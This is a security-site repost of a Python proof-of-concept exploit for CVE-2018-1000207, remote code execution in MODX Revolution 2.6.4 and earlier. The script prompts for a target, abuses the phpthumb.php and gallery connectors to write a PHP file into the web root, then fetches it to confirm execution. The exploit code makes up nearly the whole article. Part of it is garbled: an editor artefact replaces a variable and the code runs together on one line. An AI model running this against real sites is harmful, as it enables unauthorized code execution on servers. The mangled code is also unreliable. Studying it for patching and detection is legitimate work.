首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Modx Revolution Remote Code Execution
来源:https://github.com/a2u 作者:Rudnykh 发布时间:2018-07-19  
# Exploit Title: Modx Revolution < 2.6.4 - Remote Code Execution
# Date: 2018-07-13
# Exploit Author: Vitalii Rudnykh
# Vendor Homepage: https://modx.com/
# Version: <= 2.6.4
# CVE : CVE-2018-1000207
 
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import requests
from colorama import init, Fore, Style
try:
    init()
 
    def cls():
        os.system('cls' if os.name == 'nt' else 'clear')
 
    cls()
 
    print(Fore.BLUE +
          '################################################################')
    print(Fore.CYAN +
          '# Proof-Of-Concept for CVE-2018-1000207 (Modx Revolution)')
    print('# by Vitalii Rudnykh')
    print('# Thanks by AgelNash')
    print('# https://github.com/a2u/CVE-2018-1000207/')
    print(Fore.BLUE +
          '################################################################')
    print('Provided only for educational or information purposes')
    print(Style.RESET_ALL)
    target = input('Enter target url (example: http(s)://domain.tld/): ')
 
    verify = True
    code = '<?php echo md5(\'a2u\'); unlink(
___FCKpd___0
SERVER[\'SCRIPT_FILENAME\']);?>' if requests.get( target + '/connectors/system/phpthumb.php', verify=verify).status_code != 404: print(Fore.GREEN + '/connectors/system/phpthumb.php - found') url = target + '/connectors/system/phpthumb.php' payload = { 'ctx': 'web', 'cache_filename': '../../payload.php', 'useRawIMoutput': '1', 'src': '.', 'IMresizedData': code, 'config_prefer_imagemagick': '0' } r = requests.post(url, data=payload, verify=verify) check = requests.get(target + 'payload.php', verify=verify) if check.text == '9bdc11de19fd93975bf9c9ec3dd7292d': print(Fore.GREEN + 'Exploitable!\n') else: print(Fore.RED + 'Not exploitable!\n') else: print(Fore.RED + 'phpthumb.php - not found') if requests.get( target + '/assets/components/gallery/connector.php', verify=verify).status_code != 404: print(Fore.GREEN + '/assets/components/gallery/connector.php - found') url = target + '/assets/components/gallery/connector.php' payload = { 'action': 'web/phpthumb', 'f': 'php', 'useRawIMoutput': '1', 'IMresizedData': 'Ok', 'config_prefer_imagemagick': '0' } r = requests.post(url, data=payload, verify=verify) if r.text == 'Ok': print(Fore.GREEN + 'Exploitable!\n') else: print(Fore.RED + 'Not exploitable!\n') else: print( Fore.RED + '/assets/components/gallery/connector.php - not found') except KeyboardInterrupt: cls()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·JavaScript Core Arbitrary Code
·PrestaShop < 1.6.1.19 - AES CB
·Linux BPF Sign Extension Local
·CMS Made Simple 2.2.5 Authenti
·HomeMatic Zentrale CCU2 Unauth
·Microsoft dnslint.exe DNS Tool
·Microsoft Windows Enterprise M
·Google Chrome - Swiftshader Bl
·Microsoft Windows .library-ms
·Google Chrome - SwiftShader Op
·QNAP Q'Center change_passwd Co
·Splinterware System Scheduler
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved